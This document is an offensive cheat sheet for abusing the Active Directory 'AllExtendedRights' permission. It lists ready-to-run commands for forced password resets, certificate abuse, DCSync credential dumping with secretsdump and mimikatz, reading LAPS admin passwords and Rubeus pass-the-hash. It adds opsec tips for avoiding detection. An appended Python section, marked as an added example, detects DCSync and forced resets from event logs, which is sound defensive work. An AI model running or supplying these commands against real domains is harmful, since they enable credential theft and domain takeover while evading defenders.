AllExtendedRights

Source has all extended rights on the target — includes User-Force-Change-Password, DS-Replication-Get-Changes, and ReadLAPSPassword depending on target type

Applies to: User/Group/Computer → User, Domain, Computer (LAPS)


Linux Abuse

Target: User — force password change (no old password needed)

# bloodyAD
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> set password <target-user> '<new-password>'

# net rpc
net rpc password <target-user> '<new-password>' -U <domain>/<username>%'<password>' -S <dc-ip>

Target: User — certificate enrollment abuse (if PKI in scope)

certipy-ad req -u <username>@<domain> -p '<password>' -ca '<ca-name>' -template User -dc-ip <dc-ip>

Target: Domain — DCSync (DS-Replication-Get-Changes + DS-Replication-Get-Changes-All)

secretsdump.py '<domain>/<username>:<password>' -dc-ip <dc-ip>
# Or with hash
secretsdump.py -hashes :<ntlm-hash> '<domain>/<username>' -dc-ip <dc-ip>

Target: Computer (LAPS enabled) — read LAPS password

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> get object '<target-computer$>' --attr ms-mcs-admpwd

# Or via ldapsearch
ldapsearch -x -H ldap://<dc-ip> -D '<username>@<domain>' -w '<password>' \
    -b 'CN=<target-computer>,CN=Computers,DC=<domain>,DC=<tld>' \
    '(objectclass=computer)' ms-mcs-admpwd

# Or via netexec
nxc ldap <dc-ip> -u <username> -p '<password>' --module laps

Target: Computer (LAPS v2 / Windows LAPS) — read msLAPS-Password

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> get object '<target-computer$>' --attr msLAPS-Password

Windows Abuse

Target: User — force password change (PowerView; PowerShell continues a line with a backtick, not a backslash)

Set-DomainUserPassword -Identity <target-user> `
    -AccountPassword (ConvertTo-SecureString '<new-password>' -AsPlainText -Force) -Credential $cred

CMD

net user <target-user> <new-password> /domain

Target: Domain — DCSync

mimikatz # lsadump::dcsync /domain:<domain> /user:Administrator
mimikatz # lsadump::dcsync /domain:<domain> /all /csv

Target: Computer — read LAPS (legacy)

Get-DomainComputer <target-computer> -Properties ms-mcs-admpwd | Select-Object -Expand ms-mcs-admpwd

Target: Computer — read LAPS v2

Get-DomainComputer <target-computer> -Properties msLAPS-Password | Select-Object -ExpandProperty msLAPS-Password
# Password is JSON-encoded — parse it

Rubeus (after getting LAPS cred — PTH to target)

Rubeus.exe asktgt /user:Administrator /rc4:<laps-ntlm-hash> /domain:<domain> /dc:<dc-ip> /nowrap

Opsec

  • Force-password-change logged as event 4723/4724 on DC
  • DCSync logged as 4662 (object access) — avoid running from a workstation, use from DC network range if possible
  • LAPS reads are LDAP queries — not directly logged unless LDAP audit is enabled
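Detection side of the Opsec notes above, as an added example that is not part of the original page: a small Python checker over constructed (simplified key=value) event records that flags 4662 replication-right access by accounts that are not domain controllers, and 4724 password resets by accounts outside an allow-list. The DC account set and the resetter allow-list are assumed inputs supplied by the caller; the two replication GUIDs are the standard control-access-right GUIDs.

```python
import re

# Control-access-right GUIDs listed in the Properties of a 4662 event when an
# account exercises directory replication (the rights DCSync relies on).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Constructed sample records in a simplified key=value form, not real Security
# log output; the GUID ending in "beef" is a made-up non-replication right.
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC01$ ObjectType=domainDNS "
    "Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "EventID=4662 SubjectUserName=jdoe ObjectType=domainDNS "
    "Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "EventID=4662 SubjectUserName=jdoe ObjectType=user "
    "Properties=00000000-0000-0000-0000-00000000beef",
    "EventID=4724 SubjectUserName=helpdesk1 TargetUserName=svc_backup",
    "EventID=4724 SubjectUserName=jdoe TargetUserName=Administrator",
    "EventID=4723 SubjectUserName=alice TargetUserName=alice",
]

def parse_event(line):
    """Turn one key=value record into a dict (values contain no spaces)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def detect(events, dc_accounts, allowed_resetters):
    """Return (rule, detail) tuples. dc_accounts holds the computer accounts of
    real domain controllers; allowed_resetters the accounts expected to reset
    other users' passwords. Both are assumed inputs from the environment."""
    alerts = []
    for line in events:
        ev = parse_event(line)
        actor = ev.get("SubjectUserName", "")
        if ev.get("EventID") == "4662":
            rights = set(ev.get("Properties", "").split(";"))
            # Replication rights are normal for DCs; anyone else is DCSync-like.
            if rights & REPLICATION_GUIDS and actor not in dc_accounts:
                alerts.append(("dcsync", actor))
        elif ev.get("EventID") == "4724":
            # 4724 is a reset of someone else's password (no old password needed).
            target = ev.get("TargetUserName", "")
            if actor not in allowed_resetters:
                alerts.append(("forced-reset", f"{actor}->{target}"))
    return alerts

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS, {"DC01$"}, {"helpdesk1"}):
        print(rule, detail)
```

Real 4662 records carry the GUIDs inside a multi-line Properties field with %%-prefixed access mask tokens, so a production parser would extract them from the event XML rather than from this flattened form.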